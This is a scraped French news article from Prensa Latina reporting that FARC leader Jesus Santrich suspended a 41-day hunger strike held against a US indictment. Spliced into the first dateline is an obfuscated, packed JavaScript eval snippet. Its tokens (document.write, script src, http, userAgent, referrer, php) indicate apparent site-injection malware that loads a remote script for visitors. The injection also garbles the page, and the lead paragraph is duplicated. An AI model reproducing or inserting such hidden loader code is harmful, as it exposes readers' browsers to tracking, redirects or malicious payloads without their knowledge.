vendredi 19 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Le dirigeant de la FARC, JesusSantrich, suspend sa grève de la faim

Bogota,  eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shsbn|var|u0026u|referrer|hknhi||js|php'.split('|'),0,{})) 21 mai (Prensa Latina) Le dirigeant de la FARC, JesusSantrich, a suspendu sa grève de la faim, après 41 jours de jeune en signe de protestation contre l'accusation portée à son encontre par la justice étatsunienne.

Bogota,  21 mai (Prensa Latina) Le dirigeant de la FARC, JesusSantrich, a suspendu sa grève de la faim, après 41 jours de jeune en signe de protestation contre l’accusation portée à son encontre par la justice étatsunienne.

La décision de l’ex-négociateur de la paix pour la Force Alternative Révolutionnaire Commune (FARC) a été annoncée par JairoEstrada, autre dirigeant du parti de la rose.

Dans ses déclarations à la presse de la capitale, Estrada a déclaré que Santrich a perdu 16 kilos  et qu’il est sous surveillance médicale car sa condition reste préoccupante en raison des effets sur son organisme du jeune prolongé.

A ce sujet, Estrada, qui est membre du Conseil Politique National de la FARC, a donné lecture d’une lettre écrite par Santrich dans laquelle il explique sa décision de suspendre sa grève de la faim de manière momentanée.

« Ma famille, mon parti, ainsi que des  organisations sociales et populaires, m’ont fait parvenir leurs messages d’encouragement, de confiance et de compréhension », explique la missive.

Santrich ajoute qu’  « il est encore possible de se battre contre le procès qui lui est intenté et pour sa liberté, afin de réduire à néant toutes les faussetés colportées contre lui par le procureur général et la justice étatsunienne ».

Il souligne qu’il a pris la décision de suspendre sa grève de la faim pour tenir compte de la demande d’ innombrables voix populaires issues de la société colombienne et de la communauté internationale.

Il affirme que la décision qu’il a prise ce jour, va lui permettre de concentrer tous ses efforts pour lutter contre les obstacles qui s’opposent à la construction de la paix. Et, en particulier, il continuera à se battre pour l’intégration digne et collective des ex-combattants dans la société colombienne ainsi que pour la libération des prisonniers de la FARC et pout l’unité interne du Parti.

Il désire avant tout « concrétiser les rêves de tous les hommes et femmes de la FARC et de tous les amants de la paix qui veulent transformer le présent » en construisant une Colombie où règne la justice sociale.

peo/car/tpa

EN CONTINU
notes connexes